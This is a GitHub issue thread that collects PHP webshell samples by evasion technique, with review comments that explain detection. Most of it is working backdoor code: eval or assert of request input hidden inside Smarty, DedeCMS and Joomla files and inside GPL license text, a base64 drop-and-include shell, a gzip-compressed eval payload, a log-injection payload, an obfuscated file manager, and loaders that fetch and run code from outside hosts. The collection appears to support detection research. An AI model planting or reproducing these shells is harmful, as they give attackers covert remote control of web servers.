Xyntax / webshell_gitment


php-webshell #2

Open Xyntax opened 6 years ago

Xyntax commented 6 years ago

http://webshell.cdxy.me/

Xyntax commented 6 years ago

test

Xyntax commented 6 years ago

调用框架库文件(白样本)的webshell

<?php
/**
 * Smarty plugin
 *
 * @package Smarty
 * @subpackage PluginsShared
 */
/**
 * evaluate compiler parameter
 *
 * @param array   $params  parameter array as given to the compiler function
 * @param integer $index   array index of the parameter to convert
 * @param mixed   $default value to be returned if the parameter is not present
 * @return mixed evaluated value of parameter or $default
 * @throws SmartyException if parameter is not a literal (but an expression, variable, …)
 * @author Rodney Rehm
 */
function smarty_literal_compiler_param($params, $index, $default=null)
{
    // not set, go default
    if (!isset($params[$index])) {
        return $default;
    }
    // test if param is a literal
    // NOTE(review): as shown, the pattern is anchored only at the start (there is no `$`),
    // so it constrains how the value begins, not the whole value. Whatever follows a
    // matching prefix still reaches eval() below.
    if (!preg_match('/^([\'"]?)[a-zA-Z0-9] (\\1)/', $params[$index])) {
        throw new SmartyException('$param[' . $index . '] is not a literal and is thus not evaluatable at compile time');
    }
    $t = null;
    // Sink: the parameter text is concatenated into PHP source and evaluated. This is only
    // safe if the check above admits nothing but a literal. Because the function reads like
    // stock framework code, triage should judge it by who calls it and with what data.
    eval("\$t = " . $params[$index] . "");
    return $t;
}

// Request data (query parameter `1`) is placed in the parameter array unmodified and handed
// to the eval-backed helper smarty_literal_compiler_param(). A file-scope call fed from
// $_GET is the anomaly to alert on here; the helper on its own looks like library code.
$params = array('code'=>$_GET[1]);
smarty_literal_compiler_param($params,'code');
Xyntax commented 6 years ago
<?php
/**
 *
 * RSS列表页
 *
 * @version        $Id: rss.php 1 15:38 2010年7月8日Z tianya $
 * @package        DedeCMS.Site
 * @copyright      Copyright (c) 2007 - 2010, DesDev, Inc.
 * @license        http://help.dedecms.com/usersguide/license.html
 * @link           http://www.dedecms.com
 */
 // Turns off PHP error reporting for the request, so failures in the lines below are not shown.
 error_reporting(0);
// Filler value: nothing visible in this listing reads the global $b
// (yuag_array() uses its own parameter named $b).
$b="zxczxczxczxczxcxzczx";
/**
 * Calls a function whose name is built at run time, with $c as its only argument.
 *
 * The name is strrev($b) with 'ss' inserted at offset 1, and it is passed to array_map()
 * as a string callback. With the call site's "trea" this yields "assert", a name that
 * never appears literally in the file.
 *
 * NOTE(review): string arguments to assert() were evaluated as code only on older PHP
 * (deprecated in 7.2, removed in 8.0); confirm the runtime version when triaging.
 * Detection: flag array_map()/call_user_func() whose callback is an expression rather
 * than a literal name or closure, especially when the data argument is request input.
 *
 * @param string $b reversed fragment of the callback name
 * @param mixed  $c value passed to the callback
 * @return void
 */
function  yuag_array($b,$c){
$b=strrev($b);
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
// The POST field 'QI@lin' is passed to the dynamically named callback before any of the
// page's normal logic runs.
yuag_array("trea",$_POST['QI@lin']);
// From here on the script does ordinary RSS page work (includes, $tid validation,
// RssView::Display()), so the page keeps rendering for normal visitors; presumably this
// is the original file content, with the lines above added to it.
require_once(dirname(__FILE__).'/../include/common.inc.php');
require_once(DEDEINC."/arc.rssview.class.php");

$tid = isset($tid) && is_numeric($tid) ? $tid : 0;
if($tid==0) die(" Request Error! ");

$rv = new RssView($tid);
$rv->Display();
Xyntax commented 6 years ago

拆分文件对抗动态检测的webshell

<?php

    // Base64-encoded blob: after base64_decode() below it is a one-line PHP stub that passes a
    // POST field to eval(), so neither "eval" nor "$_POST" appears in this file as plain text.
    $cfg_ml='PD9waHAgQGV2YWwoJF9QT1NUWydndWlnZSddKT8+';

    $cfg_ml = base64_decode($cfg_ml);
    // Drop-file name: md5 of an integer from 1 to 100, so only 100 distinct names are possible.
    $t = md5(mt_rand(1,100));
    // (The original comment is mis-encoded on this page.) First candidate location: a
    // session-style file name under /data/sessions in the document root.
    $f=$_SERVER['DOCUMENT_ROOT'].'/data/sessions/sess_'.$t;
    @file_put_contents($f,$cfg_ml);
    // Each block below runs only if no file exists yet at $f, and tries the next location.
    if(!file_exists($f))
    {    
        // Relative path, resolved against the process's current working directory.
        $f=$t;
        @file_put_contents($f,$cfg_ml);
    }
    if(!file_exists($f))
    {
        $f=$_SERVER['DOCUMENT_ROOT'].'/a/'.$t;
        @file_put_contents($f,$cfg_ml);
    }
    if(!file_exists($f))
    {
        // (Original comment mis-encoded.) Fallback: the document root itself.
        $f=$_SERVER['DOCUMENT_ROOT'].'/'.$t;
        @file_put_contents($f,$cfg_ml);
    }
    if(!file_exists($f))
    {
        $f='/tmp/'.$t;
        @file_put_contents($f,$cfg_ml);
    } 
    // (Original comment mis-encoded.) The dropped file is executed via include and then
    // deleted, so it exists on disk only while this request runs. A scanner that inspects
    // files at rest sees neither file as a complete shell: this one holds an opaque string,
    // the dropped one is short-lived. Audit for a write followed by an include of the same
    // path, and for include targets under session or temp directories. All calls are
    // prefixed with `@`, so failures produce no warnings in the log.
    @include($f);
    @unlink($f);  

?>
Xyntax commented 6 years ago
<?php
// Downloader: copy() reads the remote .txt URL and writes it to a local .php file; echo
// prints copy()'s boolean result. Reading a remote source requires the URL fopen wrappers
// (allow_url_fopen); with that setting off the copy fails. Detection: copy() or
// file_put_contents() with an http(s) source and a .php destination, and the web-server
// account creating new .php files under the document root.
echo copy("http://www.r57.me/c99.txt","lostwolf.php");
?>
Xyntax commented 6 years ago

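编码类 (encoding-based: the payload is stored compressed and is only unpacked at run time by `gzuncompress()` inside `eval()`, so a scan of the file's literal text never sees the code; flag `eval()` wrapped directly around a decode or decompress call. The sample below contains raw binary bytes and is not rendered faithfully on this page.)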

<?php eval(gzuncompress("xڕR?n?0\x0c=/@???.??M{???l@??Kr?T?,ː?nm?/e%?%??BR||??(6?P&?n??I?k?\x00?+߈?T?T???MX????2??P???\x0aV?4V??X???z,?\x0a?a2C?x?%?gMs?]\x24??ʾ?Z\x24i:??zv??R??ʴsB?i??xxZ<????{??tK\x09hᥩ?3??ƿvbNt?x?q????枓?j??CDnU???<?O??Ż??\x0a?^x?c?'>;V|\x0c??G4W?D9'|2-????+z???4?a??8?Wĩ7????????\x22?t7\x0c?,?h?}?hc1????_UJp??????n?E?e?>??uWF???E|??????0?9\x09??nZ1\x09v???Sna?? ?Ӱ\x22D?=_?#|ܔ?⺄]??;???N"));
Xyntax commented 6 years ago

本地依赖

<?php
// Database backup segment in EmpireBak format (per the header comment below).
// NOTE(review): DoSetDbChar(), E_D() and E_C() are not defined in this listing; presumably
// inc/header.php provides them and they execute the SQL passed in. Confirm against the tool.
require("../../inc/header.php");

/*
        SoftName : EmpireBak Version 2010
        Author   : wm_chief
        Copyright: Powered by www.phome.net
*/

DoSetDbChar('gbk');
E_D("DROP TABLE IF EXISTS `dede_mytag`;");
E_C("CREATE TABLE `dede_mytag` (
  `aid` mediumint(8) unsigned NOT NULL AUTO_INCREMENT,
  `typeid` smallint(5) unsigned NOT NULL DEFAULT '0',
  `tagname` varchar(30) NOT NULL DEFAULT '',
  `timeset` smallint(6) NOT NULL DEFAULT '0',
  `starttime` int(10) unsigned NOT NULL DEFAULT '0',
  `endtime` int(10) unsigned NOT NULL DEFAULT '0',
  `normbody` text,
  `expbody` text,
  PRIMARY KEY (`aid`),
  KEY `tagname` (`tagname`,`typeid`,`timeset`,`endtime`,`starttime`)
) ENGINE=MyISAM AUTO_INCREMENT=19016 DEFAULT CHARSET=gbk");
// The two rows below carry the payload as data: the seventh value (column `normbody`) is a
// {dede:php} template tag whose body writes a new .php file containing an eval() stub.
// This backup file runs no request-controlled code itself; the tag body would run when the
// CMS renders it (presumably; confirm against the CMS's tag handling). Review point: treat
// a database backup as code before restoring it, and search its data columns for
// `{dede:php}`, `file_put_contents` and `eval(`.
E_D("replace into `dede_mytag` values('3117','0','','0','0','0','{dede:php}file_put_contents(''mybak.php'',''<?php eval(\$_POST[mybak]);?>'');{/dede:php}',NULL);");
E_D("replace into `dede_mytag` values('2143','0','','0','0','0','{dede:php}file_put_contents(''hkmke.php'',''hkmke<?php eval(\$_POST[hkmke]);?>'');{/dede:php}',NULL);");

require("../../inc/footer.php");
?>
Xyntax commented 6 years ago

后门生成器

<?php
// Generator: the visible output is a phpinfo() dump, while the second tag writes fa.php, a
// file whose content passes a POST field to eval(). The second tag uses the short open tag
// `<?`, which only runs when short_open_tag is enabled. The artefact left on disk is
// fa.php, not this script: look for .php files created by the web-server account next to
// any script that calls fopen(..., "w") with a .php name.
phpinfo();?><?fputs(fopen("fa.php","w"),"<?eval(\$_POST[cmd]);?>")?>
Xyntax commented 6 years ago

内存马

<?php
// Resident loop with no file on disk: the script deletes itself, then keeps running inside
// the PHP worker that served the request, fetching and evaluating remote content every
// five seconds. File scanning finds nothing after the first request. Look instead for a
// long-lived PHP worker making a periodic outbound HTTP request, and for access-log
// entries for a script path that no longer exists. Restarting the PHP workers ends the
// loop; egress filtering or allow_url_fopen=Off stops the fetch.
unlink($_SERVER['SCRIPT_FILENAME']); // delete this script file
ignore_user_abort(true); // keep running after the client disconnects, waiting for instructions
set_time_limit(0); // no execution time limit, so the script is never stopped by timeout
$remote_file = 'http://www.d0cs.org/shell.txt';
while($code = file_get_contents($remote_file)){ // fetch the content of $remote_file; the loop ends when the fetch returns false or an empty string
  @eval($code);
  sleep(5);
};
?>
Xyntax commented 6 years ago

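自定义HTTP头+混淆 (custom HTTP header plus obfuscation: in the listing below, names are produced by bitwise `&`, `|`, `^` and `~` operations on string literals and unquoted bare words, with `#` and `/* */` comments interleaved mid-expression, and the results are then called as functions through variables. Signatures keyed on function names will not match, so flag files dominated by string bitwise operators and variable-function calls instead.)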

<?php
$XR='r0nw'&~Y0dTO1Wt;$ZAps4M='+l-'&')fw';$AKsSa=FAPZB." "|HDAHH.'!';$j5gQLS=#XTQGk'.
   'c{'.wwtw_w.'}~ov}oo'&'sw}o~w_w}~su}oo';$PqU=#li5cBcb42vVsRV4pLBKntygCNiV5lHCR'.
   'HA*:[ q`@}T@0ZLb>y M^@$@4@tA%0PI'|'@]'.kkR4UPA.'-'.PJt8_.'!Va%XB@RB0@'./*lCU5'.
    'UP@0M*/TPc0PK;$FtaeUxv='}9Z~?V@[4~o}Mj>'.Z_zK.'?'.keFwUsOd.'^We}'&'}{zN?'./*n'.
    'fLL*/wxGiDe.'}mOz[oKa~~7'.Owuug.'{~{n{';$rG4r3bseFJ='*n}Pqf-n#g'^#a_lCdbiaBRR'.
   'm81-2Eu0~C';$rB='b1`]gAD~`A'|'!6`Ag@'.ptYG;$L_X96rF='kO>w=?~'&'Q{mw>7^';'yuBw'.
    '-.A';$yc='@@b @"!'|'BBp)@`)';$mdKTVt=EcP791|UAFQ."<u";$Ulin='4z#j1!K'^#IMQIwU'.
   'c>Q pir';$wVYqzGy5='u%!k*{il`'^'=qu;u#690';$BywtZ8QaHFk=_KELlmn&'_Wa~M[_';'BU'.
    'iGh o|';$YzuZ=n^')';$PpCD4RJ914D="+|*%"^t0ck;$IIBxK1GA_=']_'&g_;$StoL=M&i;'Jb'.
    'K8f-._$Js';$IXedwT=T&D;$ZVe4pZrS1=$ZAps4M|('^di'^';D]');$atE4muYNLph=(#Dfao7h'.
   '  $;$G'|') %$$U')^$AKsSa;$vUr=$j5gQLS&('A^>1NQy%F+'.SHI8.'['^#Ereo6cpaZFW9p3w'.
   '&$YX8<&C1E$4 W5');$Pwp6=('!Pec|L'^VlMPH5)^('?h}go>'&'?k|s{y');$HLOTWYy3Ip6=/*'.
    '2c@lB!:Kru*/$PqU^$FtaeUxv;$bAXD1h2s=$rG4r3bseFJ^$rB;$O0Xnet=("9{".SIkzl&#gIg3'.
   '=~'.KQnZo)^$L_X96rF;$ro74Wy=$yc|$Ulin;$OIYd=$mdKTVt&('ysO[r}'&'{w_[y}');if(/*'.
    'Tf0tz*/$ZVe4pZrS1($atE4muYNLph($Pwp6))==$HLOTWYy3Ip6)$bIywY=$vUr($bAXD1h2s,/*'.
    'HNy*/$atE4muYNLph($wVYqzGy5.$BywtZ8QaHFk.$YzuZ.$PpCD4RJ914D.$IIBxK1GA_./*wQit'.
    'NLNa~*/$StoL.$IXedwT));$bIywY($O0Xnet,$ro74Wy,$OIYd);#k;xvCWvgqQ!L>?10w:u&{E'.
   '@!*V9v939Jjr,?+kMW$8#{^v7[MR9pBS,PSH.o5}';
?>
icukeup commented 6 years ago

1、花括号包裹变量 <?php assert(${_GET}[cmd]);?> 2、&变量传递 <?php $a = &$_GET; assert($a[c]); ?>

icukeup commented 6 years ago

1、花括号包裹变量 \<?php assert(${_GET}[cmd]);?> 2、&变量传递 \<?php $a = &$_GET; assert($a[c]); ?>

icukeup commented 6 years ago

1、花括号包裹变量 \<?php assert(${_GET}[cmd]);?> 2、&变量传递 \<?php $a = &$_GET; assert($a[c]); ?>

Xyntax commented 5 years ago
<?php
// Obfuscated file manager. Every function name is stored reversed, in short string pieces,
// and restored with strrev(), itself assembled as "st"."rr"."ev". The restored names are
// file and directory functions such as file_put_contents, file_get_contents and
// move_uploaded_file. A `/*+/*+*/` comment sits between each variable and its call
// parentheses, and $_FILES is written as ${"_F"."IL"."ES"}, so neither the function names
// nor that superglobal appear literally.
// The `act` query parameter selects the operation; paths and URLs come from POST fields,
// and no authentication check is visible.
// Detection: a strrev()/concatenation result used as a callable, a comment token between
// a variable and `(`, and a superglobal reached through `${...}` with a concatenated name.
error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" 
value="ok"></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D&nbsp;'.$fn.'<br>';}else{$t2.='&nbsp;&nbsp;'.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}exit;}?>
Xyntax commented 5 years ago

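LICENSE障眼法,将webshell输入输出点拆成两块,隐藏在license里面,插到CMS文件的原始代码头部。 (LICENSE camouflage: the webshell's input point and output point are split into two pieces, hidden inside a license text, and inserted at the head of a CMS file's original code. In the listing below the two live statements sit between a `*/` and the next `/*` in the middle of the license wording, so checking only the first lines of a header comment misses them; tokenising the file and listing the code that lies outside comments exposes `extract($_COOKIE)` and the variable-function call.)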

<?php /*            GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007

Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.

                        Preamble

The GNU General Public License is a free, copyleft license for
software and other kinds of works.

The licenses for most software and other practical works are designed
to take away your freedom to share and change the works.  By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.  We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors.  You can apply it to
your programs, too.

When we speak of free software, we are referring to freedom, not
price.  Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.

To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights.  Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.

For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received.  You must make sure that they, too, receive
or can get the source code.  And you must show them these terms so they
know their rights.

Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you */extract($_COOKIE);/* copy, distribute and/or modify it.

For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software.  For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.

Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so.  This is fundamentally incompatible with the aim of
protecting users' freedom to change the software.  The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable.  Therefore, we
have designed this version of the GPL to prohibit the practice for those
products.  If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.

Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. patents applied to  GPL assures that
patents cannot be used to render the program non-free.

The precise terms and conditions for copying, distribution and
modification follow.

                   TERMS AND CONDITIONS

0. Definitions.

"This License" refers to version 3 of the GNU General Public License.

"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.

"The Program" refers to any copyrightable work licensed under this
License.  Each licensee is addressed as "you".  "Licensees" and
"recipients" may be individuals or organizations.

To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy.  The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.

A "covered work" means either the unmodified Program or a work based
on the Program.

To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy.  Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.

To "convey" a work means any kind of propagation that enables other
parties to make or receive copies.  Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.

An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License.  If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.

1. Source Code.

The "source code" for a work means the preferred form of the work
for making modifications to it.  "Object code" means any non-source
form of a work.

A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.

The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form.  A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.

The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities.  However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not */@$PC4E20&&@$F($A,$B);/*.  For example, Corresponding Source

the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.

The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.

The Corresponding Source for a work in source code form is that
same work.

2. Basic Permissions.

All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met.  This License explicitly affirms your unlimited
permission to run the unmodified Program.  The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work.  This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.

You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force.  You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright.  Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.

Conveying under any other circumstances is permitted solely under
the conditions stated below.  Sublicensing is not allowed; section 10
makes it unnecessary. */ ?>
Xyntax commented 5 years ago

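日志注入(注入注释符,跳出注释块将恶意代码插入到php代码块中) (log injection: a comment terminator in the request breaks out of the comment block, so the injected code lands in live PHP. The log below is itself a PHP file that records each request URL inside `/* ... */`; keeping such logs outside the web root, or in a format the interpreter never executes, removes the sink.)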

<?php^M
/*^M
Page: /wap.php?action=list&id=392%20test^M
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test) And arcrank=0 limit 0,1' at line 1 <br />Error sql: <font color='red'>Select count(*) as dd From `dede_archives` where typeid in(392 test) And arcrank=0 limit 0,1;</font>^M
*/^M
?>^M
<?php^M
/*^M
Page: /wap.php?action=list&id=392%20test^M
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test) And arcrank=0 order by id desc limit 0,10' at line 1 <br />Error sql: <font color='red'>Select id,title,pubdate,click From `dede_archives` where typeid in(392 test) And arcrank=0 order by id desc limit 0,10</font>^M
*/^M
?>^M
<?php^M
/*^M
Page: /plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*^M
Error: Illegal double '1024e1024' value found during parsing <br />Error sql: <font color='red'>Select goodpost,badpost,scores From `dede_archives` where id=1024e1024 limit 0,1;</font>^M
*/^M
?>^M
<?php^M
/*^M
Page: /^M
Error: DedeCms´íÎ󾯸棺<font color='red'>Á¬½ÓÊý¾Ý¿âʧ°Ü£¬¿ÉÄÜÊý¾Ý¿âÃÜÂë²»¶Ô»òÊý¾Ý¿â·þÎñÆ÷³ö´í£¡</font>^M
*/^M
?>
Xyntax commented 5 years ago

文件中间隐蔽型插马

<?php
/**
 * @package     Joomla.Platform
 * @subpackage  Application
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE
 */

// NOTE(review): this guard is negated. Execution stops when JPATH_PLATFORM *is* defined and
// continues when it is not, which is the opposite of a "no direct access" check.
!defined('JPATH_PLATFORM') or die;

/**
 * Base object Instance of SimplePie_Sanitize (or other class)
 *
 * @since  11.4
 */

/**
 * SimplePie Name
 */
define('SIMPLEPIE_NAME', 'SimplePie');

/**
 * SimplePie Version
 */
define('SIMPLEPIE_VERSION', '1.2');

/**
 * SimplePie Build
 */
define('SIMPLEPIE_BUILD', '20090627192103');

/**
 * SimplePie Session ID
 */
// Despite the docblock, this reads request input: $_SERVER['HTTP_SESSION'] is the value of
// a client-supplied request header named `Session`. $id is consumed by the statement
// placed after the getOutput() docblock further down in this file.
$id = $_SERVER['HTTP_SESSION'];

/**
 * Class constructor.
 *
 * @param   JInputCli         $input       An optional argument to provide dependency injection for the application's
 *                                         input object.  If the argument is a JInputCli object that object will become
 *                                         the application's input object, otherwise a default input object is created.
 * @param   Registry          $config      An optional argument to provide dependency injection for the application's
 *                                         config object.  If that object will become
 *                                         the application's config object, otherwise a default config object is created.
 * @param   JEventDispatcher  $dispatcher  An optional argument to provide dependency injection for the application's
 *                                         event dispatcher.  If the argument become
 *                                         the application's event dispatcher, if it is null then the default event dispatcher
 *                                         will be created based on the application's loadDispatcher() method.
 *
 * @see     JApplicationBase::loadDispatcher()
 * @since   11.1
 */

function construct($input = null, $config = null, $dispatcher = null)
{
    // NOTE(review): this function is declared at file scope, yet its body uses $this, and no
    // enclosing class is visible in this listing. It reads as a method lifted out of its
    // class: filler surrounding the statements hidden between the docblocks, presumably
    // never called. Confirm that nothing invokes it.

    // Close the application if we are not executed from the command line.
    // @codeCoverageIgnoreStart
    if (!defined('STDOUT') || !defined('STDIN') || !isset($_SERVER['argv']))
    {
        $this->close();
    }
    // @codeCoverageIgnoreEnd

    // If a input object is given use it.
    if ($input instanceof JInput)
    {
        $this->input = $input;
    }
    // Create the input based on the application logic.
    else
    {
        if (class_exists('JInput'))
        {
            $this->input = new JInputCli;
        }
    }

    // If a config object is given use it.
    if ($config instanceof Registry)
    {
        $this->config = $config;
    }
    // Instantiate a new configuration object.
    else
    {
        $this->config = new Registry;
    }

    $this->loadDispatcher($dispatcher);

    // Load the configuration object.
    $this->loadConfiguration($this->fetchConfigurationData());

    // Set the execution datetime and timestamp;
    $this->set('execution.datetime', gmdate('Y-m-d H:i:s'));
    $this->set('execution.timestamp', time());

    // Set the current directory.
    $this->set('cwd', getcwd());
}

/**
 * Returns a reference to the global JApplicationCli object, only creating it if it doesn't already exist.
 *
 * This method must be invoked as: $cli = JApplicationCli::getInstance();
 *
 * @param   string  $name  The*/$sess = @$_COOKIE[ssid];/*of the JApplicationCli class to instantiate.
 *
 * @return  JApplicationCli
 *
 * @since   11.1
 */ $a='as';
// NOTE(review): two live statements are hidden in the docblock above. On the @param line a
// `*/ ... /*` pair closes and reopens the comment around an assignment of the `ssid` cookie
// to $sess, and the text after the final `*/` assigns 'as' to $a. A token dump or syntax
// highlighting (anything that shows the code outside comments) exposes both; a visual skim
// of the docblock does not.

function getInstance($name = null)
{
    // NOTE(review): `self::` is used here outside any class (no class declaration is visible
    // in this listing). Whether a file containing this compiles at all depends on the PHP
    // version; confirm before reasoning about the file's run-time behaviour. The function
    // reads as a method copied out of its class to pad the file.

    // Only create the object if it doesn't exist.
    if (empty(self::$instance))
    {
        if (class_exists($name) && (is_subclass_of($name, 'JApplicationCli')))
        {
            self::$instance = new $name;
        }
        else
        {
            self::$instance = new JApplicationCli;
        }
    }

    return self::$instance;
}

/**
 * Execute the application.
 *
 * @return  void
 *
 * @since   11.1
 */ $b='sert'; $a=$a.$b;
// NOTE(review): the statements after the closing `*/` are live code. They append 'sert' to
// $a; if $a still holds the 'as' assigned after the getInstance() docblock, it now holds
// 'assert'. The name is split across two docblock tails so that it never appears whole.
function execute()
{
    // NOTE(review): file-scope function whose body uses $this; no enclosing class is visible
    // in this listing, so it reads as filler copied from a class (presumably never called).

    // Trigger the onBeforeExecute event.
    $this->triggerEvent('onBeforeExecute');

    // Perform application routines.
    $this->doExecute();

    // Trigger the onAfterExecute event.
    $this->triggerEvent('onAfterExecute');
}

/**
 * Load an object or array into the application configuration object.
 *
 * @param   mixed  $data  Either an array or object to be loaded into the configuration object.
 *
 * @return  JApplicationCli  Instance of $this to allow chaining.
 *
 * @since   11.1
 */ $start = strpos($sess,'f3be52');
// NOTE(review): the statement after the closing `*/` is live code. It records where the
// marker string 'f3be52' occurs in $sess, which is assigned from the `ssid` cookie inside
// the getInstance() docblock. The result is tested with `=== 0` after the getOutput()
// docblock, so the marker works as a gate on the cookie value.
function loadConfiguration($data)
{
    // NOTE(review): file-scope function whose body uses $this; no enclosing class is visible
    // in this listing, so it reads as filler copied from a class (presumably never called).

    // Load the data into the configuration object.
    if (is_array($data))
    {
        $this->config->loadArray($data);
    }
    elseif (is_object($data))
    {
        $this->config->loadObject($data);
    }

    return $this;
}

/**
 * Write a string to standard output.
 *
 * @param   string   $text  The text to display.
 * @param   boolean  $nl    True (default) to append a new line at the end of the output string.
 *
 * @return  JApplicationCli  Instance of $this to allow chaining.
 *
 * @codeCoverageIgnore
 * @since   11.1
 */
function out($text = '', $nl = true)
{
    // NOTE(review): file-scope function whose body uses $this; no enclosing class is visible
    // in this listing, so it reads as filler copied from a class (presumably never called).
    $output = $this->getOutput();
    $output->out($text, $nl);

    return $this;
}

/**
 * Get an output object.
 *
 * @return  CliOutput
 *
 * @since   3.3
 */ if($start===0){@${a}($id);}
// NOTE(review): the statement after the closing `*/` is the only call among the hidden
// fragments. When $sess begins with the marker ($start === 0), it calls the function named
// by $a with $id as its argument, with errors suppressed by `@`. `${a}` reaches $a through
// the bare word `a`. From the earlier fragments $a is 'assert' and $id is the `Session`
// request header. String arguments to assert() were evaluated as code only on older PHP
